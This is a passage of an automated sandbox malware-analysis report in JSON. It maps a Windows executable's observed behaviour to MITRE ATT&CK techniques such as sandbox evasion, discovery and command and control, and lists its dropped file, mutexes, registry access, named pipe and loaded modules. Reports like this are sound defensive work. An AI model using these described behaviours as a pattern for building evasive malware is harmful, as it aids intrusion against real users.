"Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hfopyujf.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74FC0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74B80000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00002700)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hfopyujf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67EE5D5B.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"hfopyujf.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"DISMHOST.EXE.67EE5D5B.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"KERNEL32.DLL\" at base 75990000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"WS2_32.DLL\" at base 75a90000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"DBGHELP.DLL\" at base 723d0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"USER32.DLL\" at base 75ad0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"ADVAPI32.DLL\" at base 76d30000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"SHELL32.DLL\" at base 76020000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"OLEAUT32.DLL\" at base 772e0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"MSVCR100.DLL\" at base 6a540000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"NTDLL.DLL\" at base 775a0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"OLE32.DLL\" at base 770b0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"CRYPTBASE.DLL\" at base 753a0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74000000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"PROPSYS.DLL\" at base 74040000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"COMCTL32.DLL\" at base 74340000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"APPHELP.DLL\" at base 75350000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"CLBCATQ.DLL\" at base 76de0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6ac80000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75990000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"SETUPAPI.DLL\" at base 77400000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"RPCRT4.DLL\" at base 75f70000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74040000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"NTMARTA.DLL\" at base 74910000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75ba0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"PROFAPI.DLL\" at base 754b0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75770000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75840000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"SECUR32.DLL\" at base 751d0000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75780000\n \"120894e1a20de2fefb24647fa436890ff581a6e33945e1a17664606e16eab5b4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75350000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 717c0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75990000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"cmd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a6b0000\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 76cc0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76d10000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 717c0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 75990000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a6b0000\n \"hfopyujf.exe\" loaded module \"GDI32.DLL\" at base 76cc0000\n \"hfopyujf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76d10000\n \"hfopyujf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 717c0000\n \"hfopyujf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hfopyujf.exe\" loaded module \"KERNEL32\" at base 75990000\n \"hfopyujf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hfopyujf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a6b0000\n \"hfopyujf.exe\" loaded module \"KERNEL32.DLL\" at base 75990000\n \"hfopyujf.exe\" loaded module \"WS2_32.DLL\" at base 75a90000\n \"hfopyujf.exe\" loaded module \"DBGHELP.DLL\" at base 723d0000\n \"hfopyujf.exe\" loaded module \"USER32.DLL\" at base 75ad0000\n \"hfopyujf.exe\" loaded module \"ADVAPI32.DLL\" at base 76d30000\n \"hfopyujf.exe\" loaded module \"SHELL32.DLL\" at base 76020000\n \"hfopyujf.exe\" loaded module \"OLEAUT32.DLL\" at base 772e0000\n \"hfopyujf.exe\" loaded module \"MSVCR100.DLL\" at base 6a360000\n \"hfopyujf.exe\" loaded module \"SSPICLI.DLL\" at base 75330000\n \"hfopyujf.exe\" loaded module \"RPCRT4.DLL\" at base 75f70000\n \"hfopyujf.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75ba0000\n \"hfopyujf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75350000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 717c0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 75990000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6e0a0000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6e010000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 75990000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6abf0000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6a090000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 68790000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75990000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6abd0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 68760000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6a700000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6a170000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 69a30000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 68740000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 6a3f0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 68630000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 75f70000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 680a0000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6a380000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 67f90000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 67eb0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 69a20000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 67e00000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 770b0000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 753a0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74000000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74eb0000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 75ad0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 76de0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6bc30000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 76d30000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75ba0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75ba0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75ba0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75ba0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74c40000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75440000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6ece0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 755f0000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74a80000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74b80000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 772e0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73800000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73710000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73b30000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 6da10000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75ba0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 6d9e0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74e70000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74d30000\n \"svchost.exe\" 